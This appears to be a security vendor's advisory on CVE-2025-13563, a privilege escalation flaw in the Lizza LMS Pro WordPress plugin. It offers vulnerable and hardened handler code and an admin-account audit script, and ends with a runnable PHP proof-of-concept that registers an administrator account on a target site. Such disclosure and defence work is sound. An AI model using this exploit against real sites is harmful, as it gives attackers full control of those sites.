Atomic Edge analysis of CVE-2025-13563 (metadata-based):
The Lizza LMS Pro plugin for WordPress contains an unauthenticated privilege escalation vulnerability. The flaw exists in the user registration function, allowing attackers to assign themselves the administrator role during account creation. This vulnerability has a CVSS score of 9.8, indicating critical severity.
CWE-269, Improper Privilege Management, directly points to a missing capability or role check. The vulnerability description specifies the ‘lizza_lms_pro_register_user_front_end’ function does not restrict user roles during registration. Atomic Edge research infers the function processes user-supplied registration data, likely from a front-end form or AJAX handler, and directly assigns the role from a request parameter without validation. This conclusion is inferred from the CWE and description, as no source code is available for confirmation.
Exploitation requires an unauthenticated attacker to send a crafted HTTP request to the plugin’s user registration endpoint. The endpoint is likely the WordPress AJAX handler at /wp-admin/admin-ajax.php with the action parameter set to ‘lizza_lms_pro_register_user_front_end’. The payload must include user registration fields like ‘user_login’, ‘user_email’, and a ‘role’ parameter set to ‘administrator’. Attackers may also need to bypass or provide a valid nonce if the function includes one, but the vulnerability description suggests role assignment occurs without proper authorization checks.
Effective remediation requires the plugin to implement a server-side role validation check. The patched version should enforce a default role, such as ‘subscriber’, for all front-end registrations. The function must discard any user-supplied role parameter. The fix should also incorporate a capability check, like current_user_can('promote_users'), if role assignment is intended for administrative users only. This aligns with WordPress security best practices for privilege management.
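The following is an added illustration of the remediation described above; it is not the plugin's code and not part of the Atomic Edge analysis. The function names, the nonce action name and the form field names are assumptions (the AJAX action is the one inferred in the advisory); the WordPress APIs used (check_ajax_referer, wp_insert_user, current_user_can, wp_roles, get_option) are real. The first function sketches the vulnerable pattern that CWE-269 and the description imply, the second shows a hardened handler that ignores the client-supplied role for public registrations.

```php
<?php
// Added example, not the plugin's own code. Handler and nonce names are assumed.

// Inferred vulnerable pattern: the role is copied straight from the request
// into wp_insert_user(), so any caller can ask for 'administrator'.
function lizza_register_user_front_end_vulnerable() {
    $user_id = wp_insert_user( [
        'user_login' => sanitize_user( $_POST['user_login'] ?? '' ),
        'user_email' => sanitize_email( $_POST['user_email'] ?? '' ),
        'user_pass'  => (string) ( $_POST['user_pass'] ?? '' ),
        'role'       => $_POST['role'] ?? 'subscriber', // attacker-controlled
    ] );
    wp_send_json( [ 'user_id' => $user_id ] );
}

// Hardened handler.
function lizza_register_user_front_end_hardened() {
    // 1. CSRF protection: the front-end form must carry a nonce (assumed name).
    check_ajax_referer( 'lizza_lms_pro_register', 'nonce' );

    $login = sanitize_user( wp_unslash( $_POST['user_login'] ?? '' ), true );
    $email = sanitize_email( wp_unslash( $_POST['user_email'] ?? '' ) );
    $pass  = (string) ( $_POST['user_pass'] ?? '' );

    if ( '' === $login || ! is_email( $email ) || strlen( $pass ) < 12 ) {
        wp_send_json_error( [ 'message' => 'Invalid registration data.' ], 400 );
    }

    // 2. Never trust a client-supplied role: every public registration gets
    //    the site's configured default role (normally 'subscriber').
    $role = get_option( 'default_role', 'subscriber' );

    // 3. Only a logged-in user holding 'promote_users' may choose a different
    //    role, and only an existing, non-administrator one. Unauthenticated
    //    callers (the wp_ajax_nopriv_ path) never pass current_user_can().
    $requested = sanitize_key( $_POST['role'] ?? '' );
    if ( '' !== $requested
        && current_user_can( 'promote_users' )
        && wp_roles()->is_role( $requested )
        && 'administrator' !== $requested ) {
        $role = $requested;
    }

    $user_id = wp_insert_user( [
        'user_login' => $login,
        'user_email' => $email,
        'user_pass'  => $pass,
        'role'       => $role,
    ] );

    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( [ 'message' => $user_id->get_error_message() ], 400 );
    }
    wp_send_json_success( [ 'user_id' => $user_id, 'role' => $role ] );
}

// Register the hardened handler for both anonymous and logged-in callers.
add_action( 'wp_ajax_nopriv_lizza_lms_pro_register_user_front_end', 'lizza_register_user_front_end_hardened' );
add_action( 'wp_ajax_lizza_lms_pro_register_user_front_end', 'lizza_register_user_front_end_hardened' );
```

The key design point is that the role is decided server-side before the request's role parameter is even looked at; the parameter can only narrow the outcome for a caller who already has the capability to assign roles, and it can never yield administrator.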
Successful exploitation grants an unauthenticated attacker full administrative access to the WordPress site. Attackers can create, modify, or delete any content, install malicious plugins or themes, manipulate user accounts, and potentially achieve remote code execution by editing theme files or plugin code. This compromises the entire site’s confidentiality, integrity, and availability.
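Because successful exploitation leaves behind an administrator account, an added defender-side check (not part of the advisory) is to audit the site's administrator users for logins that are not on an allowlist or that were registered recently. The script below is meant for WP-CLI (`wp eval-file audit-admins.php`) on a site you administer; the allowlist and the 30-day window are constructed placeholders, and get_users, WP_User fields and the WP_CLI output helpers are real APIs.

```php
<?php
// Added audit script, not the plugin's or the advisory's code.
// Run with: wp eval-file audit-admins.php

$known_admins = [ 'siteowner' ];   // constructed allowlist: replace with your real admin logins
$lookback     = new DateTimeImmutable( '-30 days', new DateTimeZone( 'UTC' ) );

// user_registered is stored in UTC by WordPress.
$admins     = get_users( [ 'role' => 'administrator', 'fields' => 'all' ] );
$suspicious = [];

foreach ( $admins as $user ) {
    $registered = new DateTimeImmutable( $user->user_registered, new DateTimeZone( 'UTC' ) );
    $unknown    = ! in_array( $user->user_login, $known_admins, true );
    $recent     = $registered >= $lookback;

    if ( $unknown || $recent ) {
        $suspicious[] = sprintf(
            '%s <%s> registered %s%s%s',
            $user->user_login,
            $user->user_email,
            $user->user_registered,
            $unknown ? ' [not in allowlist]' : '',
            $recent ? ' [registered within lookback window]' : ''
        );
    }
}

if ( empty( $suspicious ) ) {
    WP_CLI::success( 'No unexpected administrator accounts found.' );
} else {
    WP_CLI::warning( count( $suspicious ) . ' administrator account(s) need review:' );
    foreach ( $suspicious as $line ) {
        WP_CLI::log( $line );
    }
}
```

Any account the script flags should be checked against your own change records before it is removed, and the plugin should be updated past the affected version at the same time, since removing the account alone does not close the registration path.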
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13563 - Lizza LMS Pro <= 1.0.3 - Unauthenticated Privilege Escalation
<?php
/**
* Proof of Concept for CVE-2025-13563.
* Assumptions based on metadata:
* 1. The plugin uses an AJAX handler for front-end registration.
* 2. The AJAX action is 'lizza_lms_pro_register_user_front_end'.
* 3. The handler accepts a 'role' parameter which is not validated.
* 4. No authentication or nonce is required for this action (inferred from 'unauthenticated').
*/
$target_url = 'https://target-site.com'; // CHANGE THIS
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Generate unique credentials to avoid conflict with existing users.
$username = 'atomic_edge_' . bin2hex(random_bytes(4));
$email = $username . '@example.com';
$password = 'AtomicEdgePoc2025!';
$post_data = [
'action' => 'lizza_lms_pro_register_user_front_end', // Inferred AJAX action from function name.
'user_login' => $username,
'user_email' => $email,
'user_pass' => $password,
'role' => 'administrator' // The malicious payload to escalate privileges.
// Other parameters like 'first_name' may be required but are omitted for brevity.
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing environments only.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[*] Target: $target_url\n";
echo "[*] Sending payload to AJAX endpoint...\n";
echo "[*] HTTP Code: $http_code\n";
echo "[*] Response: $response\n";
echo "\nIf successful, an administrator account with credentials:\n";
echo "Username: $username\n";
echo "Password: $password\n";
echo "Email: $email\n";
echo "should be created. Attempt to log in at $target_url/wp-login.php\n";
?>